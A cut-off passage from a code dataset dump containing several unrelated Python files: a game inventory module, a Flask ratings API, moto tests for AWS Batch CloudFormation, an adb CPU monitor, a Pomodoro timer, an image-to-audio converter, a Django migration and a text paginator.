print('未能正常运行用例'+data['number'])\n\n","sub_path":"pages/app_login_page.py","file_name":"app_login_page.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"554013669","text":"from commerce.item import Item\ninventory_number = 0\nallItems = {\n \n}\n\ndef get_id_number():\n global inventory_number\n\n inventory_number += 1;\n return inventory_number - 1;\n\ndef getItem(name=None, description=None):\n for item in allItems.values():\n if (name != None and item.name == name):\n return item\n elif (description != None and item.description == description):\n return item\n return \"Invalid\"\n\n#The passed in item here will be of the Item class\ndef addItem(item):\n if (getItem(name=item.Name) != \"Invalid\"):\n item.Quantity += 1\n else:\n index = get_id_number()\n allItems[index] = item\n\n#The passed in item here will be inputs for Item class\n#name, description, quatity=1, price=0, damageHP=0\ndef addItem(name, description, quantity=1, price=0, damageHP=0):\n output = getItem(name=name)\n if (output == \"Invalid\"):\n newItem = Item(name, description, quantity, price, damageHP)\n index = get_id_number()\n allItems[index] = newItem\n else:\n output.Quantity += 1\n#Python rework of addItem version 1:\n# def addItemInstance(item):\n # [Insert body of first addItem version]\n# def addItemFromData(name, description, quantity=1, price=0, damageHP=0):\n # [Insert body of second addItem version]\n\n# referenceItem = Item(\"An instance\", \"Use for type comparison\")\n# def addItem(name_or_item, description=None, quantity=1, price=0, damageHP=0): #Sadly, Python doesn't support function overloading, so this has to be one function\n # if type(name_or_item) == type(referenceItem): #Could also have a required argument specifying the mode\n # addItemInstance(name_or_item)\n # elif description == None: #Not an item, description required.\n # raise TypeError(\"Must specify description when name_or_item is not an Item instance\")\n # else:\n # addItemFromData(name_or_item, description, quantity, price, damageHP)\n\n#Second Python rework of addItem:\n# referenceItem = Item(\"An instance\", \"Use for type comparison\")\n# def addItem(name_or_item, description=None, quantity=1, price=0, damageHP=0):\n # if type(name_or_item) == type(referenceItem): #Again, required argument specifying mode also works\n # item = name_or_item\n # name = item.Name\n # elif description == None: #Same as in addItem\n # raise TypeError(\"Must specify description when name_or_item is not an Item instance\")\n # else:\n # name = name_or_item\n # item = Item(name, description, quantity, price, damageHP)\n \n # output = getItem(name) #Unless you think the order will change, it's fine to use positional arguments\n # if output == \"Invalid\":\n # key = get_id_number() #It's technically a key, not an index (though the syntax is the same), by the way\n # allItem[key] = newItem\n # else:\n # output.Quantity += 1 #I'm not sure if it should be incremented by 1 or by the quantity parameter\n\n#Delete by accessing the id number\ndef delete_item(id):\n if not (id in allItems.keys()):\n return \"ErrorNotFound\";\n allItems.get(id).Quantity -= 1\n if (allItems.get(id).Quantity <= 0):\n allItems.remove(id)\n\ndef inventory_update_from_instance(user_instance):\n global allItems\n allItems = user_instance.getDataField(\"allItems\");","sub_path":"util/variable/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633468244","text":"import json\nfrom flask import Flask,request\n\nimport config, loader\n\napp = Flask(__name__)\n\n@app.route(\"/ratings\", methods=[\"GET\"])\ndef ratings():\n data_loader = loader.Loader()\n data = data_loader.load()\n return json.dumps(data)\n\n@app.route(\"/ratings/\", methods=[\"GET\"])\ndef rating_one(book_id):\n data_loader = loader.Loader()\n data = data_loader.load()\n if book_id not in data.keys():\n return json.dumps({})\n return data[book_id]\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"projects/ratings/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"580386895","text":"import boto3\nimport json\nfrom moto import mock_iam, mock_ec2, mock_ecs, mock_cloudformation\nfrom moto import mock_batch_simple as mock_batch_without_docker\nfrom uuid import uuid4\n\n\n# Copy of test_batch/test_batch_cloudformation\n# Except that we verify this behaviour still works without docker\n\n\nDEFAULT_REGION = \"eu-central-1\"\n\n\ndef _get_clients():\n return (\n boto3.client(\"ec2\", region_name=DEFAULT_REGION),\n boto3.client(\"iam\", region_name=DEFAULT_REGION),\n boto3.client(\"ecs\", region_name=DEFAULT_REGION),\n boto3.client(\"logs\", region_name=DEFAULT_REGION),\n boto3.client(\"batch\", region_name=DEFAULT_REGION),\n )\n\n\ndef _setup(ec2_client, iam_client):\n \"\"\"\n Do prerequisite setup\n :return: VPC ID, Subnet ID, Security group ID, IAM Role ARN\n :rtype: tuple\n \"\"\"\n resp = ec2_client.create_vpc(CidrBlock=\"172.30.0.0/24\")\n vpc_id = resp[\"Vpc\"][\"VpcId\"]\n resp = ec2_client.create_subnet(\n AvailabilityZone=\"eu-central-1a\", CidrBlock=\"172.30.0.0/25\", VpcId=vpc_id\n )\n subnet_id = resp[\"Subnet\"][\"SubnetId\"]\n resp = ec2_client.create_security_group(\n Description=\"test_sg_desc\", GroupName=str(uuid4())[0:6], VpcId=vpc_id\n )\n sg_id = resp[\"GroupId\"]\n\n role_name = str(uuid4())[0:6]\n resp = iam_client.create_role(\n RoleName=role_name, AssumeRolePolicyDocument=\"some_policy\"\n )\n iam_arn = resp[\"Role\"][\"Arn\"]\n iam_client.create_instance_profile(InstanceProfileName=role_name)\n iam_client.add_role_to_instance_profile(\n InstanceProfileName=role_name, RoleName=role_name\n )\n\n return vpc_id, subnet_id, sg_id, iam_arn\n\n\n@mock_cloudformation()\n@mock_ec2\n@mock_ecs\n@mock_iam\n@mock_batch_without_docker\ndef test_create_env_cf():\n ec2_client, iam_client, _, _, _ = _get_clients()\n _, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)\n\n create_environment_template = {\n \"Resources\": {\n \"ComputeEnvironment\": {\n \"Type\": \"AWS::Batch::ComputeEnvironment\",\n \"Properties\": {\n \"Type\": \"MANAGED\",\n \"ComputeResources\": {\n \"Type\": \"EC2\",\n \"MinvCpus\": 0,\n \"DesiredvCpus\": 0,\n \"MaxvCpus\": 64,\n \"InstanceTypes\": [\"optimal\"],\n \"Subnets\": [subnet_id],\n \"SecurityGroupIds\": [sg_id],\n \"InstanceRole\": iam_arn.replace(\"role\", \"instance-profile\"),\n },\n \"ServiceRole\": iam_arn,\n },\n }\n }\n }\n cf_json = json.dumps(create_environment_template)\n\n cf_conn = boto3.client(\"cloudformation\", DEFAULT_REGION)\n stack_name = str(uuid4())[0:6]\n stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[\n \"StackId\"\n ]\n\n stack_resources = cf_conn.list_stack_resources(StackName=stack_id)\n summary = stack_resources[\"StackResourceSummaries\"][0]\n\n assert summary[\"ResourceStatus\"] == \"CREATE_COMPLETE\"\n # Spot checks on the ARN\n assert \"arn:aws:batch:\" in summary[\"PhysicalResourceId\"]\n assert stack_name in summary[\"PhysicalResourceId\"]\n\n\n@mock_cloudformation()\n@mock_ec2\n@mock_ecs\n@mock_iam\n@mock_batch_without_docker\ndef test_create_job_queue_cf():\n ec2_client, iam_client, _, _, _ = _get_clients()\n _, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)\n\n create_environment_template = {\n \"Resources\": {\n \"ComputeEnvironment\": {\n \"Type\": \"AWS::Batch::ComputeEnvironment\",\n \"Properties\": {\n \"Type\": \"MANAGED\",\n \"ComputeResources\": {\n \"Type\": \"EC2\",\n \"MinvCpus\": 0,\n \"DesiredvCpus\": 0,\n \"MaxvCpus\": 64,\n \"InstanceTypes\": [\"optimal\"],\n \"Subnets\": [subnet_id],\n \"SecurityGroupIds\": [sg_id],\n \"InstanceRole\": iam_arn.replace(\"role\", \"instance-profile\"),\n },\n \"ServiceRole\": iam_arn,\n },\n },\n \"JobQueue\": {\n \"Type\": \"AWS::Batch::JobQueue\",\n \"Properties\": {\n \"Priority\": 1,\n \"ComputeEnvironmentOrder\": [\n {\n \"Order\": 1,\n \"ComputeEnvironment\": {\"Ref\": \"ComputeEnvironment\"},\n }\n ],\n },\n },\n }\n }\n cf_json = json.dumps(create_environment_template)\n\n cf_conn = boto3.client(\"cloudformation\", DEFAULT_REGION)\n stack_name = str(uuid4())[0:6]\n stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[\n \"StackId\"\n ]\n\n stack_resources = cf_conn.list_stack_resources(StackName=stack_id)\n assert len(stack_resources[\"StackResourceSummaries\"]) == 2\n\n job_queue_resource = list(\n filter(\n lambda item: item[\"ResourceType\"] == \"AWS::Batch::JobQueue\",\n stack_resources[\"StackResourceSummaries\"],\n )\n )[0]\n\n assert job_queue_resource[\"ResourceStatus\"] == \"CREATE_COMPLETE\"\n # Spot checks on the ARN\n assert job_queue_resource[\"PhysicalResourceId\"].startswith(\"arn:aws:batch:\")\n assert stack_name in job_queue_resource[\"PhysicalResourceId\"]\n assert \"job-queue/\" in job_queue_resource[\"PhysicalResourceId\"]\n\n\n@mock_cloudformation\n@mock_ec2\n@mock_ecs\n@mock_iam\n@mock_batch_without_docker\ndef test_create_job_def_cf():\n ec2_client, iam_client, _, _, _ = _get_clients()\n _, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)\n\n create_environment_template = {\n \"Resources\": {\n \"ComputeEnvironment\": {\n \"Type\": \"AWS::Batch::ComputeEnvironment\",\n \"Properties\": {\n \"Type\": \"MANAGED\",\n \"ComputeResources\": {\n \"Type\": \"EC2\",\n \"MinvCpus\": 0,\n \"DesiredvCpus\": 0,\n \"MaxvCpus\": 64,\n \"InstanceTypes\": [\"optimal\"],\n \"Subnets\": [subnet_id],\n \"SecurityGroupIds\": [sg_id],\n \"InstanceRole\": iam_arn.replace(\"role\", \"instance-profile\"),\n },\n \"ServiceRole\": iam_arn,\n },\n },\n \"JobQueue\": {\n \"Type\": \"AWS::Batch::JobQueue\",\n \"Properties\": {\n \"Priority\": 1,\n \"ComputeEnvironmentOrder\": [\n {\n \"Order\": 1,\n \"ComputeEnvironment\": {\"Ref\": \"ComputeEnvironment\"},\n }\n ],\n },\n },\n \"JobDefinition\": {\n \"Type\": \"AWS::Batch::JobDefinition\",\n \"Properties\": {\n \"Type\": \"container\",\n \"ContainerProperties\": {\n \"Image\": {\n \"Fn::Join\": [\n \"\",\n [\n \"137112412989.dkr.ecr.\",\n {\"Ref\": \"AWS::Region\"},\n \".amazonaws.com/amazonlinux:latest\",\n ],\n ]\n },\n \"ResourceRequirements\": [\n {\"Type\": \"MEMORY\", \"Value\": 2000},\n {\"Type\": \"VCPU\", \"Value\": 2},\n ],\n \"Command\": [\"echo\", \"Hello world\"],\n \"LinuxParameters\": {\"Devices\": [{\"HostPath\": \"test-path\"}]},\n },\n \"RetryStrategy\": {\"Attempts\": 1},\n },\n },\n }\n }\n cf_json = json.dumps(create_environment_template)\n\n cf_conn = boto3.client(\"cloudformation\", DEFAULT_REGION)\n stack_name = str(uuid4())[0:6]\n stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[\n \"StackId\"\n ]\n\n stack_resources = cf_conn.list_stack_resources(StackName=stack_id)\n assert len(stack_resources[\"StackResourceSummaries\"]) == 3\n\n job_def_resource = list(\n filter(\n lambda item: item[\"ResourceType\"] == \"AWS::Batch::JobDefinition\",\n stack_resources[\"StackResourceSummaries\"],\n )\n )[0]\n\n assert job_def_resource[\"ResourceStatus\"] == \"CREATE_COMPLETE\"\n # Spot checks on the ARN\n assert job_def_resource[\"PhysicalResourceId\"].startswith(\"arn:aws:batch:\")\n assert f\"{stack_name}-JobDef\" in job_def_resource[\"PhysicalResourceId\"]\n assert \"job-definition/\" in job_def_resource[\"PhysicalResourceId\"]\n\n # Test the linux parameter device host path\n # This ensures that batch is parsing the parameter dictionaries\n # correctly by recursively converting the first character of all\n # dict keys to lowercase.\n batch_conn = boto3.client(\"batch\", DEFAULT_REGION)\n response = batch_conn.describe_job_definitions(\n jobDefinitions=[job_def_resource[\"PhysicalResourceId\"]]\n )\n job_def_linux_device_host_path = response.get(\"jobDefinitions\")[0][\n \"containerProperties\"\n ][\"linuxParameters\"][\"devices\"][0][\"hostPath\"]\n\n assert job_def_linux_device_host_path == \"test-path\"\n","sub_path":"tests/test_batch_simple/test_batch_cloudformation.py","file_name":"test_batch_cloudformation.py","file_ext":"py","file_size_in_byte":9619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"379139210","text":"# coding:utf8\nimport csv, os, time\n\n\n# 控制类\nclass Controller(object):\n def __init__(self, count):\n self.counter = count\n self.alldata = [('timestamp', 'cpustatus')]\n\n # 单次测试过程\n def testprocess(self):\n result = os.popen(\"adb shell dumpsys cpuinfo | grep package\")\n for line in result.readlines():\n cpuvalue = line.split('%')[0]\n\n currenttime = self.getCurrentTime()\n self.alldata.append((currenttime, cpuvalue))\n\n # 多次执行测试过程\n def run(self):\n while self.counter > 0:\n self.testprocess()\n self.counter = self.counter - 1\n time.sleep(5)\n\n # 获取当前的时间戳\n def getCurrentTime(self):\n currentTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n return currentTime\n\n # 数据的存储\n def saveDataCSV(self):\n csvfile = open('cpustatus.csv', 'wb')\n writer = csv.writer(csvfile)\n writer.writerrows(self.alldata)\n csvfile.close()\n\n\nif __name__=='__main__':\n controller = Controller(10)\n controller.run()\n controller.saveDataCSV()","sub_path":"PerformenceScript/CpuTest.py","file_name":"CpuTest.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"52798237","text":"from tkinter import *\nimport math\n\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\nrun_time = 0\ntim = None\n\n\n# ---------------------------- TIMER RESET ------------------------------- #\ndef reset():\n windows.after_cancel(tim)\n timer_label.config(text=\"Timer\", fg=GREEN)\n canvas.itemconfig(timer_text, text=\"00:00\")\n checkmark_label.config(text=\"\")\n\n\n# ---------------------------- TIMER MECHANISM ------------------------------- #\ndef start_timer():\n global run_time\n if run_time == 0 or run_time == 2 or run_time == 4 or run_time == 6:\n timer_label.config(text=\"Work\", fg=RED)\n count_down(WORK_MIN * 60)\n mark = \" \"\n for _ in range(run_time):\n mark += \"✔\"\n checkmark_label.config(text=mark)\n elif run_time == 1 or run_time == 3 or run_time == 5:\n timer_label.config(text=\"Break\", fg=PINK)\n count_down(SHORT_BREAK_MIN * 60)\n mark = \" \"\n for _ in range(run_time):\n mark += \"✔\"\n checkmark_label.config(text=mark)\n elif run_time == 7:\n timer_label.config(text=\"Break\", fg=GREEN)\n count_down(LONG_BREAK_MIN * 60)\n mark = \" \"\n for _ in range(run_time):\n mark += \"✔\"\n checkmark_label.config(text=mark)\n\n\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #\ndef count_down(count):\n global tim\n minute = math.floor(count / 60)\n sec = count % 60\n if sec >= 0 and minute >= 0:\n canvas.itemconfig(timer_text, text=f\"{minute}:{sec}\")\n if sec < 10:\n canvas.itemconfig(timer_text, text=f\"{minute}:0{sec}\")\n if minute == 0 and sec == 0:\n global run_time\n run_time += 1\n start_timer()\n tim = windows.after(1000, count_down, count - 1)\n\n\n# ---------------------------- UI SETUP ------------------------------- #\nwindows = Tk()\nwindows.title(\"pomodoro\")\nwindows.config(padx=100, pady=50, bg=YELLOW)\n# label for Timer text\ntimer_label = Label(text=\"Timer\", fg=GREEN, font=(FONT_NAME, 35, \"bold\"), bg=YELLOW)\n# label for checkmark\ncheckmark_label = Label(fg=GREEN, bg=YELLOW)\n# canvas for the tomato picture\ncanvas = Canvas(width=200, height=224, bg=YELLOW, highlightthickness=0)\nmy_image = PhotoImage(file=\"tomato.png\")\ncanvas.create_image(100, 112, image=my_image)\ntimer_text = canvas.create_text(100, 130, text=\"00:00\", fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\n# created a button called start\nstart_button = Button(text=\"Start\", bg=YELLOW, command=start_timer)\n# created a button called restart\nreset_button = Button(text=\"Reset\", bg=YELLOW, command=reset)\n# grid all of them together\ntimer_label.grid(row=0, column=3)\ncanvas.grid(row=1, column=3)\nstart_button.grid(row=2, column=1)\nreset_button.grid(row=2, column=4)\ncheckmark_label.grid(row=3, column=3)\nwindows.mainloop()\n","sub_path":"Pomodoro/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574610773","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom PIL import Image, ImageOps\nimport wave, math, array, argparse, sys, timeit\nfrom tkinter import Tk, Label, Entry, Button, END\nfrom math import floor\n\ndef createUI():\n root = Tk()\n root.title(\"Здесь могла быть ваша реклама\")\n root.resizable(False, False)\n\n ui_table = [\n [\"Имя входного файла\", \"Здесь могла быть ваша реклама\"],\n [\"Имя выходного фалйа\", \"out.wav\"],\n [\"Нижний порог частот\", \"200\"],\n [\"Верхний порог частот\", \"200000\"],\n [\"Пикселей в секунду\", \"30\"],\n [\"Частота дискретизации\", \"44100\"]\n ]\n\n entries = []\n \n for row, info in enumerate(ui_table):\n label = Label(root, text=info[0], font=\"arial 24\")\n label.grid(row=row, padx=25, sticky=\"w\")\n\n entries.append(Entry(root, font=\"arial 24\", fg=\"grey\"))\n entries[-1].grid(row=row, column=1, padx=25)\n entries[-1].insert(END, info[1])\n\n convert_button = Button(root, text=\"Конвертировать\", font=\"arial 32\", command=lambda: convert(\n entries[0].get(),\n entries[1].get(),\n int(entries[2].get()),\n int(entries[3].get()),\n int(entries[4].get()),\n int(entries[5].get()))\n )\n convert_button.grid(row=6, column=0, columnspan=2, pady=20)\n\n root.mainloop()\n\ndef parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"INPUT\", help=\"Имя входного файла.\")\n parser.add_argument(\"-n\", \"--name\", help=\"Имя выходного файла. Базовое имя: out.wav).\")\n parser.add_argument(\"-b\", \"--bottom\", help=\"Нижний порог частот. Базовое значение: 200.\", type=int)\n parser.add_argument(\"-t\", \"--top\", help=\"Верхний порог частот. Базовое значение: 20000.\", type=int)\n parser.add_argument(\"-p\", \"--pixels\", help=\"Пикселей в секунду. Базовое значение: 30.\", type=int)\n parser.add_argument(\"-s\", \"--sampling\", help=\"Частота дискретизации. Базовое значение: 44100.\", type=int)\n args = parser.parse_args()\n\n minfreq = 200\n maxfreq = 20000\n wavrate = 44100\n pxs = 30\n name = \"out.wav\"\n\n if args.name:\n name = args.name\n if args.bottom:\n minfreq = args.bottom\n if args.top:\n maxfreq = args.top\n if args.pixels:\n pxs = args.pixels\n if args.sampling:\n wavrate = args.sampling\n\n\n print('Пеобразуемая картинка: %s.' % args.INPUT)\n print('Частотный диапазон: %d - %d.' % (minfreq, maxfreq))\n print('Пикселей в секунду: %d.' % pxs)\n print('Частота дискретизации: %d.' % wavrate)\n print('Имя выходного файла: %s.' % (args.name if name else 'out.wav'))\n\n return (args.INPUT, name, minfreq, maxfreq, pxs, wavrate)\n\ndef convert(inpt, name, minfreq, maxfreq, pxs, wavrate):\n\n # Tkinter\n root = Tk()\n root.title(\"Прогресс\")\n\n progress_label = Label(root, text=\"Прогресс\", font=\"arial 24\")\n progress_label.pack()\n\n img = Image.open(inpt).convert('L')\n name = wave.open(name, 'w')\n name.setparams((1, 2, wavrate, 0, 'NONE', 'not compressed'))\n\n freqrange = maxfreq - minfreq\n interval = freqrange / img.size[1]\n\n fpx = wavrate // pxs\n data = array.array('h')\n\n tm = timeit.default_timer()\n\n for x in range(img.size[0]):\n row = []\n for y in range(img.size[1]):\n yinv = img.size[1] - y - 1\n amp = img.getpixel((x,y))\n if (amp > 0):\n row.append( genwave(yinv * interval + minfreq, amp, fpx, wavrate) )\n\n for i in range(fpx):\n for j in row:\n try:\n data[i + x * fpx] += j[i]\n except(IndexError):\n data.insert(i + x * fpx, j[i])\n except(OverflowError):\n if j[i] > 0:\n data[i + x * fpx] = 32767\n else:\n data[i + x * fpx] = -32768\n\n # sys.stdout.write(\"Преобразование в процессе, осталось: %d%% \\r\" % (float(x) / img.size[0]*100) )\n # sys.stdout.flush()\n\n progress_label.configure(text=f\"Преобразование в процессе, осталось: {float(x) / img.size[0] * 100:.2f}%\")\n root.update()\n\n # Pylint говорил, что в data нет метода .tostring()\n name.writeframes(data)\n name.close()\n\n tms = timeit.default_timer()\n\n progress_label.configure(text=f\"Преобразование в процессе, осталось: 100%\")\n root.destroy()\n print(\"Преобразование в процессе, осталось: 100%\")\n print(\"Успешно завершено за %d секунд.\" % int(tms-tm))\n\ndef genwave(frequency, amplitude, samples, samplerate):\n cycles = samples * frequency / samplerate\n a = []\n for i in range(samples):\n x = math.sin(float(cycles) * 2 * math.pi * i / float(samples)) * float(amplitude)\n a.append(int(math.floor(x)))\n return a\n\nif __name__ == '__main__':\n #inpt = parser()\n #convert(*inpt)\n createUI()\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"168655378","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('djcelery', '__first__'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('backend', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DailyOptimizerTask',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('is_active', models.BooleanField(default=True)),\n ('last_scheduled_on', models.DateTimeField(null=True, blank=True)),\n ('lighting_enabled', models.BooleanField(default=True)),\n ('lighting_series_light', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n ('hvac_enabled', models.BooleanField(default=True)),\n ('hvac_series_compressor', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n ('hvac_series_pump_chiller', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n ('hvac_series_pump_cooling', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n ('hvac_series_temp', models.CharField(default=None, max_length=1024, null=True, blank=True)),\n ('eu_target', models.ForeignKey(blank=True, to='backend.EnergyUnit', null=True)),\n ],\n options={\n 'verbose_name_plural': 'Daily Optimizer Tasks',\n },\n ),\n migrations.CreateModel(\n name='Interval',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.CreateModel(\n name='OptimizerTask',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('is_active', models.BooleanField(default=True)),\n ('config_json', models.TextField(null=True, blank=True)),\n ('context_json', models.TextField(null=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True, null=True)),\n ('last_scheduled_on', models.DateTimeField(null=True, blank=True)),\n ('crontab', models.ForeignKey(blank=True, to='djcelery.CrontabSchedule', null=True)),\n ('eu_id', models.ForeignKey(blank=True, to='backend.EnergyUnit', null=True)),\n ('interval', models.ForeignKey(blank=True, to='optimizer.Interval', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='OptimizerType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n ),\n migrations.CreateModel(\n name='Priority',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n ),\n migrations.CreateModel(\n name='Recommendation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.TextField(default=None, max_length=256, null=True, blank=True)),\n ('description', models.TextField(default=None, max_length=5000, null=True, blank=True)),\n ('saving_potential', models.CharField(default=None, max_length=254, null=True, blank=True)),\n ('energy_saved', models.CharField(default=None, max_length=254, null=True, blank=True)),\n ('sub_category', models.IntegerField(default=0, null=True, verbose_name=b'sub-category', blank=True)),\n ('date_of_creation', models.DateField(auto_now_add=True, null=True)),\n ('date_of_complete', models.DateField(default=None, null=True, blank=True)),\n ('date_of_completion', models.DateField(default=None, null=True, blank=True)),\n ],\n options={\n 'verbose_name_plural': 'Recommendations',\n },\n ),\n migrations.CreateModel(\n name='RecommendationCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Categories',\n },\n ),\n migrations.CreateModel(\n name='RecommendationComplexity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Complexities',\n },\n ),\n migrations.CreateModel(\n name='RecommendationPayback',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation PaybackTime',\n },\n ),\n migrations.CreateModel(\n name='RecommendationStatus',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Statuses',\n },\n ),\n migrations.CreateModel(\n name='RecommendationStatusLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date_of_change', models.DateField(auto_now_add=True, null=True)),\n ('changed_by', models.ForeignKey(default=None, blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ('new_status', models.ForeignKey(related_name='new_status', default=None, blank=True, to='optimizer.RecommendationStatus', null=True)),\n ('old_status', models.ForeignKey(related_name='old_status', default=None, blank=True, to='optimizer.RecommendationStatus', null=True)),\n ('recommendation', models.ForeignKey(default=None, blank=True, to='optimizer.Recommendation', null=True)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Status Log',\n },\n ),\n migrations.CreateModel(\n name='TimePeriod',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time_period', models.CharField(max_length=45, null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Value',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time_value', models.IntegerField(null=True, blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='recommendation',\n name='category',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationCategory', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='complexity',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationComplexity', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='energy_unit',\n field=models.ForeignKey(default=None, blank=True, to='backend.EnergyUnit', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='paybacktime',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationPayback', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='status',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationStatus', null=True),\n ),\n migrations.AddField(\n model_name='optimizertask',\n name='optimizertype',\n field=models.ForeignKey(to='optimizer.OptimizerType'),\n ),\n migrations.AddField(\n model_name='optimizertask',\n name='priority',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.Priority', null=True),\n ),\n migrations.AddField(\n model_name='optimizertask',\n name='task',\n field=models.ForeignKey(blank=True, to='djcelery.PeriodicTask', null=True),\n ),\n migrations.AddField(\n model_name='interval',\n name='time_period',\n field=models.ForeignKey(blank=True, to='optimizer.TimePeriod', null=True),\n ),\n migrations.AddField(\n model_name='interval',\n name='time_value',\n field=models.ForeignKey(blank=True, to='optimizer.Value', null=True),\n ),\n migrations.AddField(\n model_name='dailyoptimizertask',\n name='priority',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.Priority', null=True),\n ),\n ]\n","sub_path":"optimizer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"166876140","text":"# 9.16. Programa para gerar arquivo paginado\n\nLARGURA = 76\nLINHAS = 60\nNOME_DO_ARQUIVO = \"mobydick.txt\"\n\n\ndef verificaPagina(arquivo, linha, pagina):\n if linha == LINHAS:\n rodape = f\"= {NOME_DO_ARQUIVO} - Página: {pagina} =\"\n arquivo.write(rodape.center(LARGURA - 1) + \"\\n\")\n pagina += 1\n linha = 1\n return linha, pagina\n\n\ndef escreve(arquivo, linha, nLinhas, pagina):\n arquivo.write(linha + \"\\n\")\n return verificaPagina(arquivo, nLinhas + 1, pagina)\n\n\nentrada = open(NOME_DO_ARQUIVO, encoding=\"utf-8\")\nsaida = open(\"saida_paginada.txt\", \"w\", encoding=\"utf-8\")\n\npagina = 1\nlinhas = 1\n\nfor linha in entrada.readlines():\n palavras = linha.rstrip().split(\" \")\n linha = \"\"\n for p in palavras:\n p = p.strip()\n if len(linha) + len(p) + 1 > LARGURA:\n linhas, pagina = escreve(saida, linha, linhas, pagina)\n linha = \" \"\n linha += p + \" \"\n if linha != \"\":\n linhas, pagina = escreve(saida, linha, linhas, pagina)\n\nwhile(linhas != 1):\n linhas, pagina = escreve(saida, \"\", linhas, 